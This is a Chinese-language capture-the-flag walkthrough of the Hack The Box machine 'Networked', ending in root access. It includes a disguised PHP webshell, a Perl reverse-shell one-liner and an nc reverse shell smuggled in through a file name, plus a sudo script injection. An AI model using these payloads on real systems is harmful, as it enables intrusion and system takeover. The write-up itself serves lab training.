Hack the box-Network

大家好，今天给大家带来的CTF挑战靶机是来自hackthebox的“Network”，hackthebox是一个非常不错的在线实验平台，能帮助你提升渗透测试技能和黑盒测试技能，平台上有很多靶机，从易到难，各个级别的靶机都有。

本级靶机难度为困难级别，任务是找到靶机上的user.txt和root.txt。

# 信息枚举

利用masscan探测开放端口

找到了22，80端口

Nmap探测22,80的服务信息

# 漏洞利用

我们先检查80端口的web，扫描web url

我们发现了几个有趣的链接

========================================== =========================

ID Response Lines Word Chars Payload

========================================== =========================

000000088: 301 7 L 20 W 235 Ch "backup"

000000862: 301 7 L 20 W 236 Ch "uploads"

我们访问url，backup是整个web备份压缩文件，下载后发现有upload.php和photos.php

我们首先来检查upload.php

<?php

require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {

if (!empty($_FILES["myFile"])) {

$myFile = $_FILES["myFile"];

if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {

echo '<pre>Invalid image file.</pre>';

displayform();

}

if ($myFile["error"] !== UPLOAD_ERR_OK) {

echo "<p>An error occurred.</p>";

displayform();

exit;

}

//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];

list ($foo,$ext) = getnameUpload($myFile["name"]);

$validext = array('.jpg', '.png', '.gif', '.jpeg');

$valid = false;

foreach ($validext as $vext) {

if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {

$valid = true;

}

}

if (!($valid)) {

echo "<p>Invalid image file</p>";

displayform();

exit;

发现upload.php可以上传shell，而且upload.php直接检查后缀和检查文件类型；

我们可以上传一个后缀为.php.png的图片shell并且在文件内容里面加上图片头，使我们通过文件检测函数；

并且在photos.php中，我们发现我们可以访问到我们上传的图片，只不过图片名称被改为以ip.php.png的格式。

if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {

continue; }

以下为我们webshell的内容

GIF8;

<?php system($_GET['cmd']); ?>

我们上传成功了

# 低权限shell

我们使用perl，回连我们的webshell

perl-e 'use Socket;$i="10.10.14.72";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

使用TTY获得一个终端:

root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444 [85/85]

listening on [any] 4444 ...

10.10.10.146: inverse host lookup failed: Unknown host

connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 49656

sh: no job control in this shell

sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

bash-4.2$ ^Z

[1]+ 已停止 nc -lvp 4444

root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo

root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444 reset

reset: unknown terminal type unnown

Terminal type? xterm

bash-4.2$ export SHELL=bash

bash-4.2$ export TERM=xterm-256color

bash-4.2$ stty rows 36 columns 144

连上后发现我们没有权限查看user.txt

并且发现user.txt在guly文件夹下面，我们进入到guly文件夹中发现了check_attack.php

<?php

require '/var/www/html/lib.php';

$path = '/var/www/html/uploads/';

$logpath = '/tmp/attack.log';

$to = 'guly';

$msg= '';

$headers = "X-Mailer: check_attack.php\r\n";

$files = array();

$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {

$msg='';

if ($value == 'index.html') {

continue;

}

#echo "-------------\n";

#print "check: $value\n";

list ($name,$ext) = getnameCheck($value);

$check = check_ip($name,$value);

if (!($check[0])) {

echo "attack!\n";

# todo: attach file

file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

exec("rm -f $logpath");

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

echo "rm -f $path$value\n";

mail($to, $msg, $msg, $headers, "-F$value");

}

}

?>

check_attack.php检查不应在uploads目录中的文件并且删除它，并且在rm命令中没有作任何过滤，这样使我们可以命令注入

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

$path = '/var/www/html/uploads/';

我们又回到uploads/目录下面，并且创建一个注入文件

touch '; nc 10.10.14,72 1234 -c bash'

过了蛮久的，nc监听的1234终于来信息了，得到nc shell的第一件事，首先就是使它变得稳定

root@localhost:~/hackthebox_workspace/Networked_146#nc-lvp 1234

listening on [any] 1234 ...

10.10.10.146: inverse host lookup failed: Unknown host

connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 46548

ls

check_attack.php

crontab.guly

lse.sh

shell2

user.txt

python -c 'import pty;pty.spawn("/bin/bash")'

[guly@networked ~]$ ^Z

[1]+ 已停止 nc -lvp 1234

root@localhost:~/hackthebox_workspace/Networked_146# fg

nc -lvp 1234

^Z

[1]+ 已停止 nc -lvp 1234

root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo

root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 1234 reset

reset: unknown terminal type unknown

Terminal type? xterm

[guly@networked ~]$ export SHELL=bash

[guly@networked ~]$ export TERM=xterm-256color

[guly@networked ~]$ stty rows 36 columns 144

[guly@networked ~]$ cat user.txt

526cfc2305f17faaa***************

最终我们得到了user.txt

# 权限提升

我们尝试sudo -l我们发现guly可以在/usr/local/sbin/changename.sh以root身份运行而且无需输入密码

[guly@networked ~]$ sudo -l

Matching Defaults entries for guly on networked:

!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR

LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT

LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET

XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:

(root) NOPASSWD: /usr/local/sbin/changename.sh

检查/usr/local/sbin/changename.sh

#!/bin/bash -p

cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF

DEVICE=guly0

ONBOOT=no

NM_CONTROLLED=no

EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do

echo "interface $var:"

read x

while [[ ! $x =~ $regexp ]]; do

echo "wrong input, try again"

echo "interface $var:"

read x

done

echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly

done

/sbin/ifup guly0

changename.sh只是接口创建网络脚本，guly激活该接口，他要求这些选项的用户：NAME，PROXY_METHOD，BROWSER_ONLY，BOOTPROTO

https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

我们根据上面的url可以发现，我们可以在NAME选项中注入命令

[guly@networked network-scripts]$ sudo /usr/local/sbin/changename.sh

interface NAME:

test bash

interface PROXY_METHOD:

test

interface BROWSER_ONLY:

test

interface BOOTPROTO:

test

[root@networked network-scripts]# id

uid=0(root) gid=0(root) groups=0(root)

[root@networked ~]# cat root.txt

0a8ecda83f1d81251***************

最后得到root.txt

手握日月摘星辰，安全路上永不止步。

- Khan攻防安全实验室